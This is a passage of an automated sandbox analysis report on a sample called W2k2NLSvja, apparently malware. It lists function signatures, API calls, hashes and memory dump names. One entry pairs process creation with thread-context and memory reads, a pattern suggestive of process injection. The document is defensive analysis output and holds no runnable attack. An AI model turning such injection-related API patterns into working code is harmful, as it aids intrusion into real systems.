                                                                                                                        • API String ID: 3902256705-0
                                                                                                                        • Opcode ID: 6ced9e121f3e7900d517ade9d84ee5a4c1648cd89f4d77ed5590f3b65b9638a7
                                                                                                                        • Instruction ID: d1b2bb6b450576e1891497c27544b22cc82362c972a66df62b2a8af04fcfdf40
                                                                                                                        • Opcode Fuzzy Hash: 6ced9e121f3e7900d517ade9d84ee5a4c1648cd89f4d77ed5590f3b65b9638a7
                                                                                                                        • Instruction Fuzzy Hash: 18F028B590020DA6CB24BA58EC019DF7BACAF023A4F204025F844A6151DFB88AC1A2E0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock_file_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 26237723-0
                                                                                                                        • Opcode ID: 95e8882a4ca49ce607d5c24ae1c3dd95c5e15f560b181847a118053747a57a77
                                                                                                                        • Instruction ID: 5ada7d5d1e83bdcf9517c349e6f9cc24e93df215171274800b64011adc036022
                                                                                                                        • Opcode Fuzzy Hash: 95e8882a4ca49ce607d5c24ae1c3dd95c5e15f560b181847a118053747a57a77
                                                                                                                        • Instruction Fuzzy Hash: 72016CF1C40609EBCF11AF65CC0559F7B71AF82BA0F144215F8145B161DB7D8A12FB51
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FA8D68: __getptd_noexit.LIBCMT ref: 00FA8D68
                                                                                                                        • __lock_file.LIBCMT ref: 00FA561B
                                                                                                                          • Part of subcall function 00FA6E4E: __lock.LIBCMT ref: 00FA6E71
                                                                                                                        • __fclose_nolock.LIBCMT ref: 00FA5626
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2800547568-0
                                                                                                                        • Opcode ID: 518bafebc0439abb3586d5846849e728c8f0d232a646cdfe1edad621090d0783
                                                                                                                        • Instruction ID: 86f67499241dcb2fd05fced6b77d945132f590aa3bf7ead1359d43d1588c0bbb
                                                                                                                        • Opcode Fuzzy Hash: 518bafebc0439abb3586d5846849e728c8f0d232a646cdfe1edad621090d0783
                                                                                                                        • Instruction Fuzzy Hash: 5DF0BBF1C00A059AD720AF758C0275E77A16F43B74F558109E414AB2C1CFBC8902BB55
                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00F51ACD
                                                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F51AF1
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F51B13
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036404083.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f50000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2438371351-0
                                                                                                                        • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                                                        • Instruction ID: 9c874840a09942c5b2e663d870af98bb3e77743c0515b42434ad0f6217d4608c
                                                                                                                        • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                                                        • Instruction Fuzzy Hash: B812FE24E18658C6EB24DF60D8507DEB232FF68301F1090E9910DEB7A4E77A5F85CB5A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 29d04b19215770c2cc5d2978cadf952bac6204312171d5a39f7d95c5da233abd
                                                                                                                        • Instruction ID: 44528896f13ec24321c80e0a8be62716249538b702a0aee839fe854bec99a0f2
                                                                                                                        • Opcode Fuzzy Hash: 29d04b19215770c2cc5d2978cadf952bac6204312171d5a39f7d95c5da233abd
                                                                                                                        • Instruction Fuzzy Hash: 5C61CDB1A0020A9FCB14EF64C991BBBB7E5EF09310F18803EE9069B281D774ED55EB51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 9fb0dd3b4fd1b3a51cd78bf8421f8bad61b0e3b92ca6721b560399c2e204023d
                                                                                                                        • Instruction ID: 8f9ed95709d20644e1e2dd913c023e9b43894aa453d716e75bfe2e0ad5b65647
                                                                                                                        • Opcode Fuzzy Hash: 9fb0dd3b4fd1b3a51cd78bf8421f8bad61b0e3b92ca6721b560399c2e204023d
                                                                                                                        • Instruction Fuzzy Hash: 9151A235A04605AFDF14FB54CD92FAD77A6AF45720F148068F806AB382CB38ED00E751
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00F85CF6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: a03f6c909d2010ce59f2e10a4c9e9f3c7dcb6710192d59f69b37374207cad6ae
                                                                                                                        • Instruction ID: 3492baabc0703da53c0bffdf7c2a8e19e1ca517815716cf625fd74a5a1ea80f5
                                                                                                                        • Opcode Fuzzy Hash: a03f6c909d2010ce59f2e10a4c9e9f3c7dcb6710192d59f69b37374207cad6ae
                                                                                                                        • Instruction Fuzzy Hash: 80311C72A00B1AAFCB18EF6DC48469DB7B5FF48720F148619D81993710D771A950EB90
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 8380ea188f4cc87ae393f944d043b621423c7c755f88dd7f7de1c6319de2a5cc
                                                                                                                        • Instruction ID: f14af291bf2eb30903f6eccebbaa0eff080b02e67faa37c8c04aa491bfd8a7f7
                                                                                                                        • Opcode Fuzzy Hash: 8380ea188f4cc87ae393f944d043b621423c7c755f88dd7f7de1c6319de2a5cc
                                                                                                                        • Instruction Fuzzy Hash: 34412774908341CFDB24DF14C484B5ABBE0BF45318F09889CE8998B762C776EC46DB52
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 856254489-0
                                                                                                                        • Opcode ID: f865473bca29f75f5d46a681b20a4729b748c3a749e3fa304ca5d936ff147d9e
                                                                                                                        • Instruction ID: f2adeca1a7560207a12b9e7be99b05419f94d12668423fc54a6118b1be0599a0
                                                                                                                        • Opcode Fuzzy Hash: f865473bca29f75f5d46a681b20a4729b748c3a749e3fa304ca5d936ff147d9e
                                                                                                                        • Instruction Fuzzy Hash: 1E119072904219DBCB14FBAADC81AEEF778FF91760F10411AF811A7190EB349D05EBA0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4104443479-0
                                                                                                                        • Opcode ID: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                                                                                                                        • Instruction ID: 6137532cf379b8cd3776bc8212131e2f70eb940559487a1584597f9650fcae61
                                                                                                                        • Opcode Fuzzy Hash: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                                                                                                                        • Instruction Fuzzy Hash: 3C115E76604605DFC724DF28D881A56B7E9FF49354B60C82EE88ACB361DB32E842DB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F84D13: FreeLibrary.KERNEL32(00000000,?), ref: 00F84D4D
                                                                                                                          • Part of subcall function 00FA548B: __wfsopen.LIBCMT ref: 00FA5496
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84F6F
                                                                                                                          • Part of subcall function 00F84CC8: FreeLibrary.KERNEL32(00000000), ref: 00F84D02
                                                                                                                          • Part of subcall function 00F84DD0: _memmove.LIBCMT ref: 00F84E1A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1396898556-0
                                                                                                                        • Opcode ID: 01cdcfc198439a193ebf92796a70d0930372f1e06848f829d7876d0cab75f34d
                                                                                                                        • Instruction ID: c9ca172ba587b46974361446732f73d08a7bb4ae7c549f936c5f138131c3c315
                                                                                                                        • Opcode Fuzzy Hash: 01cdcfc198439a193ebf92796a70d0930372f1e06848f829d7876d0cab75f34d
                                                                                                                        • Instruction Fuzzy Hash: F011C432600707ABCB21FF71CC12FEE77A99F44710F10842DF981A7181DA79AA05BB60
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: 64c77d953146053c9ea21d7fb71bad8a409af9211e7fbece86ebb22dd49454c7
                                                                                                                        • Instruction ID: 1f8a1fd3184ee511890eb5863733844ad4f22368a79cf014bfb845bbc4dd7d24
                                                                                                                        • Opcode Fuzzy Hash: 64c77d953146053c9ea21d7fb71bad8a409af9211e7fbece86ebb22dd49454c7
                                                                                                                        • Instruction Fuzzy Hash: 0A2144B4908342CFDB24EF24C844B5ABBE0FF84314F05896CE89A47761D775E845EB52
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00F85807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00F85D76
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: dfae98376fd2d9e002738f6419418862f4072a566ae4c81d289ea4251b622465
                                                                                                                        • Instruction ID: 7846daa86e69b75c1c1db994aadb1023ffcbbc3a50c615ae12677d72031270b3
                                                                                                                        • Opcode Fuzzy Hash: dfae98376fd2d9e002738f6419418862f4072a566ae4c81d289ea4251b622465
                                                                                                                        • Instruction Fuzzy Hash: 01113D32604B019FD3319F15C844BA6B7E5EF45B60F10C91DE8AA86650D771F945DB60
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 856254489-0
                                                                                                                        • Opcode ID: a9116756285663f9eb4e6fb643dd2895c979c092ac8b1c53e4af206a19173447
                                                                                                                        • Instruction ID: fc0ffdb610e6904b172e6f06573f8dd73d8be78007215958f86a8392c4fa4f04
                                                                                                                        • Opcode Fuzzy Hash: a9116756285663f9eb4e6fb643dd2895c979c092ac8b1c53e4af206a19173447
                                                                                                                        • Instruction Fuzzy Hash: 2A010472C082855FDB11AB258C616EDFFB4EF57320F15809AD890AB191D2348C46EF91
                                                                                                                        APIs
                                                                                                                        • __lock_file.LIBCMT ref: 00FA4AD6
                                                                                                                          • Part of subcall function 00FA8D68: __getptd_noexit.LIBCMT ref: 00FA8D68
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2597487223-0
                                                                                                                        • Opcode ID: b1d19309049f81359a8546fb1214b02116825cf76375e6c2944af999e6792c5e
                                                                                                                        • Instruction ID: 80afa48f168fa932b3afb3f3a9eb6fa7ba8d5632893d094c7cbc693412599cd4
                                                                                                                        • Opcode Fuzzy Hash: b1d19309049f81359a8546fb1214b02116825cf76375e6c2944af999e6792c5e
                                                                                                                        • Instruction Fuzzy Hash: 85F0A4B19402099BDF61AFA48C0639F3661AF82365F044518B424AA1D1CBFC9961FF55
                                                                                                                        APIs
                                                                                                                        • FreeLibrary.KERNEL32(?,?,010462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84FDE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeLibrary
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3664257935-0
                                                                                                                        • Opcode ID: 03d603d3df0ee4f639b79b69a854a26f098ec731aed8a8fe8d8d2cad5c145e47
                                                                                                                        • Instruction ID: 461daf828b269fb728e9413a5d4dbc90f3c064799c54b2ae63857d0e95181d75
                                                                                                                        • Opcode Fuzzy Hash: 03d603d3df0ee4f639b79b69a854a26f098ec731aed8a8fe8d8d2cad5c145e47
                                                                                                                        • Instruction Fuzzy Hash: 96F03072505713CFCB34AF64E494992BBE1BF153293248A3EE2D683610C775A840EF40
                                                                                                                        APIs
                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA09F4
                                                                                                                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongNamePath_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2514874351-0
                                                                                                                        • Opcode ID: 54374a6a63b8872c15801d39066a8e32b204043cfc0af9f35c39d136d5fbdead
                                                                                                                        • Instruction ID: 0ed3d15804e86fd0e1f3e37838e9c35fa6ed0821133eb3b250376c7bfed587bc
                                                                                                                        • Opcode Fuzzy Hash: 54374a6a63b8872c15801d39066a8e32b204043cfc0af9f35c39d136d5fbdead
                                                                                                                        • Instruction Fuzzy Hash: 05E0863690422857C721E6589C05FFA77ADDF88790F0441B5FC4CD7209D965AC819690
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __fread_nolock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2638373210-0
                                                                                                                        • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                                                                        • Instruction ID: 9972761dc0a72d24c071eb43ff72cb8bf8cbfd15337e7e7e7f7ee5fec10bd68d
                                                                                                                        • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                                                                                                                        • Instruction Fuzzy Hash: B0E092B0508B405FDB348A24D8107E373E0BB06315F00081CF29A83341EBA67841D759
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00FBE16B,?,?,00000000), ref: 00F85DBF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
